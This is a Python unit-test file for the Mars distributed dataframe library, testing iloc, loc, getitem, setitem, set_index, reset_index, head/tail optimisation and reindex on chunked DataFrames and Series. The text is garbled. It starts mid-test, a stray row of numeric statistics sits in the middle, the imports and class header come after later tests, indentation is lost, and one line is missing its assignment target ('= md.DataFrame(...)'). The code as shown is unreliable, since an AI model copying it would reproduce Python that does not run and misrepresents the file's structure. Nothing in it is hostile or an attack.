self.assertEqual(df2.shape, (2, 2))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, [True, False, True]].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)
# test fancy index on columns axis
df2 = df.loc[[True, False, True], ['z', 'x', 'y']]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 3))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, ['z', 'x', 'y']].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 2)
for c in df2.chunks:
self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
pd.testing.assert_index_equal(c.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(c.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(c.columns_value.to_pandas(),
raw.loc[:, ['z', 'x', 'y']].columns)
pd.testing.assert_series_equal(c.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)
df2 = df.loc[md.Series([True, False, True])]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (np.nan, 3))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
df2 = df3.loc[md.Series([True, False, True])]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (np.nan, 3))
self.assertIsInstance(df2.index_value.to_pandas(), type(raw.loc[[True, False, True]].index))
self.assertNotEqual(df2.index_value.key, df3.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
df2 = df3.loc[md.Series([2, 1])]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 3))
self.assertIsInstance(df2.index_value.to_pandas(), type(raw2.loc[[2, 1]].index))
self.assertNotEqual(df2.index_value.key, df3.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
series2 = series.loc['a2']
self.assertIsInstance(series2, Tensor)
self.assertEqual(series2.shape, ())
self.assertEqual(series2.dtype, s.dtype)
series2 = series.loc[['a2', 'a3']]
self.assertIsInstance(series2, Series)
self.assertEqual(series2.shape, (2,))
self.assertEqual(series2.dtype, s.dtype)
self.assertEqual(series2.name, s.name)
with self.assertRaises(IndexingError):
_ = df.loc['a1', 'z', ...]
with self.assertRaises(NotImplementedError):
_ = df.loc[:, md.Series([True, False, True])]
with self.assertRaises(KeyError):
_ = df.loc[:, ['non_exist']]
def testLocUseIloc(self):
raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
columns=['x', 'y', 'z'])
df = md.DataFrame(raw, chunk_size=2)
self.assertIsInstance(df.loc[:3].op, DataFrameIlocGetItem)
self.assertIsInstance(df.loc[1:3].op, DataFrameIlocGetItem)
self.assertIsInstance(df.loc[1].op, DataFrameIlocGetItem)
# negative
self.assertIsInstance(df.loc[:-3].op, DataFrameLocGetItem)
with self.assertRaises(KeyError):
_ = df.loc[-3]
# index 1 not None
self.assertIsInstance(df.loc[:3, :'y'].op, DataFrameLocGetItem)
# index 1 not slice
self.assertIsInstance(df.loc[:3, [True, False, True]].op, DataFrameLocGetItem)
self.assertIsInstance(df.loc[[True, False, True]].op, DataFrameLocGetItem)
raw2 = raw.copy()
raw2.index = pd.RangeIndex(1, 4)
df2 = md.DataFrame(raw2, chunk_size=2)
self.assertIsInstance(df2.loc[:3].op, DataFrameLocGetItem)
self.assertIsInstance(df2.loc['a3':].op, DataFrameLocGetItem)
raw2 = raw.copy()
raw2.index = [f'a{i}' for i in range(3)]
df2 = md.DataFrame(raw2, chunk_size=2)
self.assertIsInstance(df2.loc[:3].op, DataFrameLocGetItem)
def testDataFrameGetitem(self):
data = pd.DataFrame(np.random.rand(10, 5), columns=['c1', 'c2', 'c3', 'c4', 'c5'])
df = md.DataFrame(data, chunk_size=2)
series = df['c3']
self.assertIsInstance(series, Series)
self.assertEqual(series.shape, (10,))
self.assertEqual(series.name, 'c3')
self.assertEqual(series.dtype, data['c3'].dtype)
self.assertEqual(series.index_value, df.index_value)
series = series.tiles()
self.assertEqual(series.nsplits, ((2, 2, 2, 2, 2),))
self.assertEqual(len(series.chunks), 5)
for i, c in enumerate(series.chunks):
self.assertIsInstance(c, SERIES_CHUNK_TYPE)
self.assertEqual(c.index, (i,))
self.assertEqual(c.shape, (2,))
df1 = df[['c1', 'c2', 'c3']]
self.assertIsInstance(df1, DataFrame)
self.assertEqual(df1.shape, (10, 3))
self.assertEqual(df1.index_value, df.index_value)
pd.testing.assert_index_equal(df1.columns_value.to_pandas(), data[['c1', 'c2', 'c3']].columns)
pd.testing.assert_series_equal(df1.dtypes, data[['c1', 'c2', 'c3']].dtypes)
df1 = df1.tiles()
self.assertEqual(df1.nsplits, ((2, 2, 2, 2, 2), (2, 1)))
self.assertEqual(len(df1.chunks), 10)
for i, c in enumerate(df1.chunks[slice(0, 10, 2)]):
self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
self.assertEqual(c.index, (i, 0))
self.assertEqual(c.shape, (2, 2))
for i, c in enumerate(df1.chunks[slice(1, 10, 2)]):
self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
self.assertEqual(c.index, (i, 1))
self.assertEqual(c.shape, (2, 1))
def testDataFrameGetitemBool(self):
data = pd.DataFrame(np.random.rand(10, 5), columns=['c1', 'c2', 'c3', 'c4', 'c5'])
df = md.DataFrame(data, chunk_size=2)
mask_data1 = data.c1 > 0.5
mask_data2 = data.c1 < 0.5
mask1 = md.Series(mask_data1, chunk_size=2)
mask2 = md.Series(mask_data2, chunk_size=2)
r1 = df[mask1]
r2 = df[mask2]
r3 = df[mask1]
self.assertNotEqual(r1.index_value.key, df.index_value.key)
self.assertNotEqual(r1.index_value.key, mask1.index_value.key)
self.assertEqual(r1.columns_value.key, df.columns_value.key)
self.assertIs(r1.columns_value, df.columns_value)
self.assertNotEqual(r1.index_value.key, r2.index_value.key)
self.assertEqual(r1.columns_value.key, r2.columns_value.key)
self.assertIs(r1.columns_value, r2.columns_value)
self.assertEqual(r1.index_value.key, r3.index_value.key)
self.assertEqual(r1.columns_value.key, r3.columns_value.key)
self.assertIs(r1.columns_value, r3.columns_value)
def testSeriesGetitem(self):
data = pd.Series(np.random.rand(10, ), name='a')
series = md.Series(data, chunk_size=3)
result1 = series[2]
self.assertEqual(result1.shape, ())
result1 = result1.tiles()
self.assertEqual(result1.nsplits, ())
self.assertEqual(len(result1.chunks), 1)
self.assertIsInstance(result1.chunks[0], TENSOR_CHUNK_TYPE)
self.assertEqual(result1.chunks[0].shape, ())
self.assertEqual(result1.chunks[0].dtype, data.dtype)
result2 = series[[4, 5, 1, 2, 3]]
self.assertEqual(result2.shape, (5,))
result2 = result2.tiles()
self.assertEqual(result2.nsplits, ((2, 2, 1),))
self.assertEqual(len(result2.chunks), 3)
self.assertEqual(result2.chunks[0].op.labels, [4, 5])
self.assertEqual(result2.chunks[1].op.labels, [1, 2])
self.assertEqual(result2.chunks[2].op.labels, [3])
data = pd.Series(np.random.rand(10), index=['i' + str(i) for i in range(10)])
series = md.Series(data, chunk_size=3)
result1 = series['i2']
self.assertEqual(result1.shape, ())
result1 = result1.tiles()
self.assertEqual(result1.nsplits, ())
self.assertEqual(result1.chunks[0].dtype, data.dtype)
self.assertTrue(result1.chunks[0].op.labels, ['i2'])
result2 = series[['i2', 'i4']]
self.assertEqual(result2.shape, (2,))
result2 = result2.tiles()
self.assertEqual(result2.nsplits, ((2,),))
self.assertEqual(result2.chunks[0].dtype, data.dtype)
self.assertTrue(result2.chunks[0].op.labels, [['i2', 'i4']])
def testSetitem(self):
data = pd.DataFrame(np.random.rand(10, 2), columns=['c1', 'c2'])
df = md.DataFrame(data, chunk_size=4)
df['new'] = 1
self.assertEqual(df.shape, (10, 3))
pd.testing.assert_series_equal(df.inputs[0].dtypes, data.dtypes)
tiled = df.tiles()
self.assertEqual(tiled.chunks[0].shape, (4, 3))
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
self.assertEqual(tiled.chunks[1].shape, (4, 3))
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
self.assertEqual(tiled.chunks[2].shape, (2, 3))
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
def testResetIndex(self):
data = pd.DataFrame([('bird', 389.0),
('bird', 24.0),
('mammal', 80.5),
('mammal', np.nan)],
index=['falcon', 'parrot', 'lion', 'monkey'],
columns=('class', 'max_speed'))
df = md.DataFrame(data, chunk_size=2).reset_index()
r = data.reset_index()
self.assertEqual(df.shape, (4, 3))
pd.testing.assert_series_equal(df.dtypes, r.dtypes)
pd.testing.assert_index_equal(df.columns_value.to_pandas(), r.columns)
df2 = df.tiles()
self.assertEqual(len(df2.chunks), 2)
self.assertEqual(df2.chunks[0].shape, (2, 3))
pd.testing.assert_index_equal(df2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
pd.testing.assert_series_equal(df2.chunks[0].dtypes, r.dtypes)
self.assertEqual(df2.chunks[1].shape, (2, 3))
pd.testing.assert_index_equal(df2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
pd.testing.assert_series_equal(df2.chunks[1].dtypes, r.dtypes)
df = md.DataFrame(data, chunk_size=1).reset_index(drop=True)
r = data.reset_index(drop=True)
self.assertEqual(df.shape, (4, 2))
pd.testing.assert_series_equal(df.dtypes, r.dtypes)
df2 = df.tiles()
self.assertEqual(len(df2.chunks), 8)
for c in df2.chunks:
self.assertEqual(c.shape, (1, 1))
pd.testing.assert_index_equal(c.index_value.to_pandas(), pd.RangeIndex(c.index[0], c.index[0] + 1))
pd.testing.assert_series_equal(c.dtypes, r.dtypes[c.index[1]: c.index[1] + 1])
# test Series
series_data = pd.Series([1, 2, 3, 4], name='foo',
index=pd.Index(['a', 'b', 'c', 'd'], name='idx'))
s = md.Series(series_data, chunk_size=2).reset_index()
r = series_data.reset_index()
self.assertEqual(s.shape, (4, 2))
pd.testing.assert_series_equal(s.dtypes, r.dtypes)
s2 = s.tiles()
self.assertEqual(len(s2.chunks), 2)
self.assertEqual(s2.chunks[0].shape, (2, 2))
pd.testing.assert_index_equal(s2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
self.assertEqual(s2.chunks[1].shape, (2, 2))
pd.testing.assert_index_equal(s2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
with self.assertRaises(TypeError):
md.Series(series_data, chunk_size=2).reset_index(inplace=True)
def testHeadTailOptimize(self):
raw = pd.DataFrame(np.random.rand(4, 3))
df = md.DataFrame(raw, chunk_size=2)
# no nan chunk shape
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df.tiles().head(2).op))
df2 = df[df[0] < 0.5].tiles()
# chunk shape on axis 1 greater than 1
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.head(2).op))
df = md.DataFrame(raw, chunk_size=(2, 3))
df2 = df[df[0] < 0.5].tiles()
# not slice
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[2].op))
# step not None
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:2:2].op))
# not head or tail
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[1:3].op))
# slice 1 is not slice(None)
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:3, :2].op))
def testReindex(self):
raw = pd.DataFrame(np.random.rand(4, 3))
df = md.DataFrame(raw, chunk_size=2)
with self.assertRaises(TypeError):
df.reindex(unknown_arg=1)
with self.assertRaises(ValueError):
df.reindex([1, 2], fill_value=mt.tensor([1, 2]))
| 47.03629 | 111 | 0.624861 |
import numpy as np
import pandas as pd
import mars.dataframe as md
import mars.tensor as mt
from mars.tensor.core import TENSOR_CHUNK_TYPE, Tensor
from mars.tests.core import TestBase
from mars.dataframe.core import SERIES_CHUNK_TYPE, Series, DataFrame, DATAFRAME_CHUNK_TYPE
from mars.dataframe.indexing.iloc import DataFrameIlocGetItem, DataFrameIlocSetItem, \
IndexingError, HeadTailOptimizedOperandMixin
from mars.dataframe.indexing.loc import DataFrameLocGetItem
class Test(TestBase):
def testSetIndex(self):
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
df3 = df2.set_index('y', drop=True)
df3 = df3.tiles()
self.assertEqual(df3.chunk_shape, (2, 2))
pd.testing.assert_index_equal(df3.chunks[0].columns_value.to_pandas(), pd.Index(['x']))
pd.testing.assert_index_equal(df3.chunks[1].columns_value.to_pandas(), pd.Index(['z']))
df4 = df2.set_index('y', drop=False)
df4 = df4.tiles()
self.assertEqual(df4.chunk_shape, (2, 2))
pd.testing.assert_index_equal(df4.chunks[0].columns_value.to_pandas(), pd.Index(['x', 'y']))
pd.testing.assert_index_equal(df4.chunks[1].columns_value.to_pandas(), pd.Index(['z']))
def testILocGetItem(self):
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
with self.assertRaises(IndexingError):
_ = df2.iloc[1, 1, 1]
with self.assertRaises(IndexingError):
_ = df2.iloc[(1,), ]
with self.assertRaises(TypeError):
_ = df2.iloc['a1':]
with self.assertRaises(NotImplementedError):
_ = df2.iloc[0, md.Series(['a2', 'a3'])]
with self.assertRaises(ValueError):
_ = df2.iloc[[[0, 1], [1, 2]]]
with self.assertRaises(ValueError):
_ = df2.iloc[1, ...]
with self.assertRaises(IndexError):
_ = df2.iloc[-4]
with self.assertRaises(IndexError):
_ = df2.iloc[3]
df3 = df2.iloc[1]
df3 = df3.tiles()
self.assertIsInstance(df3, Series)
self.assertIsInstance(df3.op, DataFrameIlocGetItem)
self.assertEqual(df3.shape, (3,))
self.assertEqual(df3.chunk_shape, (2,))
self.assertEqual(df3.chunks[0].shape, (2,))
self.assertEqual(df3.chunks[1].shape, (1,))
self.assertEqual(df3.chunks[0].op.indexes, (1, slice(None, None, None)))
self.assertEqual(df3.chunks[1].op.indexes, (1, slice(None, None, None)))
self.assertEqual(df3.chunks[0].inputs[0].index, (0, 0))
self.assertEqual(df3.chunks[0].inputs[0].shape, (2, 2))
self.assertEqual(df3.chunks[1].inputs[0].index, (0, 1))
self.assertEqual(df3.chunks[1].inputs[0].shape, (2, 1))
df4 = df2.iloc[:, 2:4]
df4 = df4.tiles()
self.assertIsInstance(df4, DataFrame)
self.assertIsInstance(df4.op, DataFrameIlocGetItem)
self.assertEqual(df4.shape, (3, 1))
self.assertEqual(df4.chunk_shape, (2, 1))
self.assertEqual(df4.chunks[0].shape, (2, 1))
pd.testing.assert_index_equal(df4.chunks[0].columns_value.to_pandas(), df1.columns[2:3])
pd.testing.assert_series_equal(df4.chunks[0].dtypes, df1.dtypes[2:3])
self.assertIsInstance(df4.chunks[0].index_value.to_pandas(), type(df1.index))
self.assertEqual(df4.chunks[1].shape, (1, 1))
pd.testing.assert_index_equal(df4.chunks[1].columns_value.to_pandas(), df1.columns[2:3])
pd.testing.assert_series_equal(df4.chunks[1].dtypes, df1.dtypes[2:3])
self.assertNotEqual(df4.chunks[0].index_value.key, df4.chunks[1].index_value.key)
self.assertIsInstance(df4.chunks[1].index_value.to_pandas(), type(df1.index))
self.assertEqual(df4.chunks[0].op.indexes, (slice(None, None, None), slice(None, None, None)))
self.assertEqual(df4.chunks[1].op.indexes, (slice(None, None, None), slice(None, None, None)))
self.assertEqual(df4.chunks[0].inputs[0].index, (0, 1))
self.assertEqual(df4.chunks[0].inputs[0].shape, (2, 1))
self.assertEqual(df4.chunks[1].inputs[0].index, (1, 1))
self.assertEqual(df4.chunks[1].inputs[0].shape, (1, 1))
df5 = df2.iloc[[0], [0, 1, 2]]
df5 = df5.tiles()
self.assertIsInstance(df5, DataFrame)
self.assertIsInstance(df5.op, DataFrameIlocGetItem)
self.assertEqual(df5.shape, (1, 3))
self.assertEqual(df5.chunk_shape, (1, 2))
self.assertEqual(df5.chunks[0].shape, (1, 2))
pd.testing.assert_index_equal(df5.chunks[0].columns_value.to_pandas(), df1.columns[:2])
pd.testing.assert_series_equal(df5.chunks[0].dtypes, df1.dtypes[:2])
self.assertIsInstance(df5.chunks[0].index_value.to_pandas(), type(df1.index))
self.assertEqual(df5.chunks[1].shape, (1, 1))
pd.testing.assert_index_equal(df5.chunks[1].columns_value.to_pandas(), df1.columns[2:])
pd.testing.assert_series_equal(df5.chunks[1].dtypes, df1.dtypes[2:])
self.assertIsInstance(df5.chunks[1].index_value.to_pandas(), type(df1.index))
np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])
self.assertEqual(df5.chunks[0].inputs[0].index, (0, 0))
self.assertEqual(df5.chunks[0].inputs[0].shape, (2, 2))
self.assertEqual(df5.chunks[1].inputs[0].index, (0, 1))
self.assertEqual(df5.chunks[1].inputs[0].shape, (2, 1))
df6 = df2.iloc[[1, 2], [0, 1, 2]]
df6 = df6.tiles()
self.assertIsInstance(df6, DataFrame)
self.assertIsInstance(df6.op, DataFrameIlocGetItem)
self.assertEqual(df6.shape, (2, 3))
self.assertEqual(df6.chunk_shape, (2, 2))
self.assertEqual(df6.chunks[0].shape, (1, 2))
self.assertEqual(df6.chunks[1].shape, (1, 1))
self.assertEqual(df6.chunks[2].shape, (1, 2))
self.assertEqual(df6.chunks[3].shape, (1, 1))
np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])
self.assertEqual(df6.chunks[0].inputs[0].index, (0, 0))
self.assertEqual(df6.chunks[0].inputs[0].shape, (2, 2))
self.assertEqual(df6.chunks[1].inputs[0].index, (0, 1))
self.assertEqual(df6.chunks[1].inputs[0].shape, (2, 1))
self.assertEqual(df6.chunks[2].inputs[0].index, (1, 0))
self.assertEqual(df6.chunks[2].inputs[0].shape, (1, 2))
self.assertEqual(df6.chunks[3].inputs[0].index, (1, 1))
self.assertEqual(df6.chunks[3].inputs[0].shape, (1, 1))
df7 = df2.iloc[1, 2]
df7 = df7.tiles()
self.assertIsInstance(df7, Tensor)
self.assertIsInstance(df7.op, DataFrameIlocGetItem)
self.assertEqual(df7.shape, ())
self.assertEqual(df7.chunk_shape, ())
self.assertEqual(df7.chunks[0].dtype, df7.dtype)
self.assertEqual(df7.chunks[0].shape, ())
self.assertEqual(df7.chunks[0].op.indexes, (1, 0))
self.assertEqual(df7.chunks[0].inputs[0].index, (0, 1))
self.assertEqual(df7.chunks[0].inputs[0].shape, (2, 1))
series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[4:8]
series = series.tiles()
self.assertEqual(series.shape, (4,))
self.assertEqual(len(series.chunks), 2)
self.assertEqual(series.chunks[0].shape, (2,))
self.assertEqual(series.chunks[0].index, (0,))
self.assertEqual(series.chunks[0].op.indexes, (slice(1, 3, 1),))
self.assertEqual(series.chunks[1].shape, (2,))
self.assertEqual(series.chunks[1].op.indexes, (slice(0, 2, 1),))
self.assertEqual(series.chunks[1].index, (1,))
series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[[2, 4, 8]]
series = series.tiles()
self.assertEqual(series.shape, (3,))
self.assertEqual(len(series.chunks), 3)
self.assertEqual(series.chunks[0].shape, (1,))
self.assertEqual(series.chunks[0].index, (0,))
self.assertEqual(series.chunks[0].op.indexes[0], [2])
self.assertEqual(series.chunks[1].shape, (1,))
self.assertEqual(series.chunks[1].op.indexes[0], [1])
self.assertEqual(series.chunks[1].index, (1,))
self.assertEqual(series.chunks[2].shape, (1,))
self.assertEqual(series.chunks[2].op.indexes[0], [2])
self.assertEqual(series.chunks[2].index, (2,))
def testILocSetItem(self):
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
df2 = df2.tiles()
df3 = md.DataFrame(df1, chunk_size=2)
df3.iloc[1] = 100
df3 = df3.tiles()
self.assertIsInstance(df3.op, DataFrameIlocSetItem)
self.assertEqual(df3.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df3.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df3.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df3.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
self.assertEqual(df3.chunks[0].op.indexes, (1, slice(None, None, None)))
self.assertEqual(df3.chunks[1].op.indexes, (1, slice(None, None, None)))
= md.DataFrame(df1, chunk_size=2)
df4.iloc[:, 2:4] = 1111
df4 = df4.tiles()
self.assertIsInstance(df4.op, DataFrameIlocSetItem)
self.assertEqual(df4.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df4.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df4.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df4.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
self.assertEqual(df4.chunks[1].op.indexes, (slice(None, None, None), slice(None, None, None)))
self.assertEqual(df4.chunks[3].op.indexes, (slice(None, None, None), slice(None, None, None)))
df5 = md.DataFrame(df1, chunk_size=2)
df5.iloc[[0], [0, 1, 2]] = 2222
df5 = df5.tiles()
self.assertIsInstance(df5.op, DataFrameIlocSetItem)
self.assertEqual(df5.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df5.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df5.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df5.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])
df6 = md.DataFrame(df1, chunk_size=2)
df6.iloc[[1, 2], [0, 1, 2]] = 3333
df6 = df6.tiles()
self.assertIsInstance(df6.op, DataFrameIlocSetItem)
self.assertEqual(df6.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df6.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df6.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df6.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])
df7 = md.DataFrame(df1, chunk_size=2)
df7.iloc[1, 2] = 4444
df7 = df7.tiles()
self.assertIsInstance(df7.op, DataFrameIlocSetItem)
self.assertEqual(df7.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df7.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df7.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df7.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
self.assertEqual(df7.chunks[1].op.indexes, (1, 0))
series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
series.iloc[:4] = 2
series = series.tiles()
self.assertEqual(series.shape, (10,))
self.assertEqual(len(series.chunks), 4)
self.assertEqual(series.chunks[0].op.indexes, [slice(None, None, None), ])
self.assertEqual(series.chunks[0].op.value, 2)
self.assertEqual(series.chunks[1].op.indexes, [slice(0, 1, 1), ])
self.assertEqual(series.chunks[1].op.value, 2)
series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
series.iloc[[2, 4, 9]] = 3
series = series.tiles()
self.assertEqual(series.shape, (10,))
self.assertEqual(len(series.chunks), 4)
self.assertEqual(series.chunks[0].index, (0,))
self.assertEqual(series.chunks[0].op.indexes[0].tolist(), [2])
self.assertEqual(series.chunks[0].op.value, 3)
self.assertEqual(series.chunks[1].index, (1,))
self.assertEqual(series.chunks[1].op.indexes[0].tolist(), [1])
self.assertEqual(series.chunks[1].op.value, 3)
self.assertEqual(series.chunks[3].index, (3,))
self.assertEqual(series.chunks[3].op.indexes[0].tolist(), [0])
self.assertEqual(series.chunks[3].op.value, 3)
def testDataFrameLoc(self):
raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df = md.DataFrame(raw, chunk_size=2)
raw2 = raw.copy()
raw2.reset_index(inplace=True, drop=True)
df3 = md.DataFrame(raw2, chunk_size=2)
s = pd.Series([1, 3, 5], index=['a1', 'a2', 'a3'])
series = md.Series(s, chunk_size=2)
df2 = df.loc['a1', 'z']
self.assertIsInstance(df2, Tensor)
self.assertEqual(df2.shape, ())
self.assertEqual(df2.dtype, raw['z'].dtype)
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 1)
self.assertIsInstance(df2.chunks[0], TENSOR_CHUNK_TYPE)
df2 = df.loc[:, 'y']
self.assertIsInstance(df2, Series)
self.assertEqual(df2.shape, (3,))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertEqual(df2.name, 'y')
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 2)
for c in df2.chunks:
self.assertIsInstance(c, SERIES_CHUNK_TYPE)
self.assertIsInstance(c.index_value.to_pandas(), type(raw.index))
self.assertEqual(c.name, 'y')
self.assertEqual(c.dtype, raw['y'].dtype)
df2 = df.loc['a2', :]
self.assertIsInstance(df2, Series)
self.assertEqual(df2.shape, (3,))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.columns_value.to_pandas())
self.assertEqual(df2.name, 'a2')
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 2)
for c in df2.chunks:
self.assertIsInstance(c, SERIES_CHUNK_TYPE)
self.assertIsInstance(c.index_value.to_pandas(), type(raw.columns))
self.assertEqual(c.name, 'a2')
self.assertEqual(c.dtype, raw.loc['a2'].dtype)
df2 = df.loc['a2': 'a3', 'y': 'z']
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (np.nan, 2))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
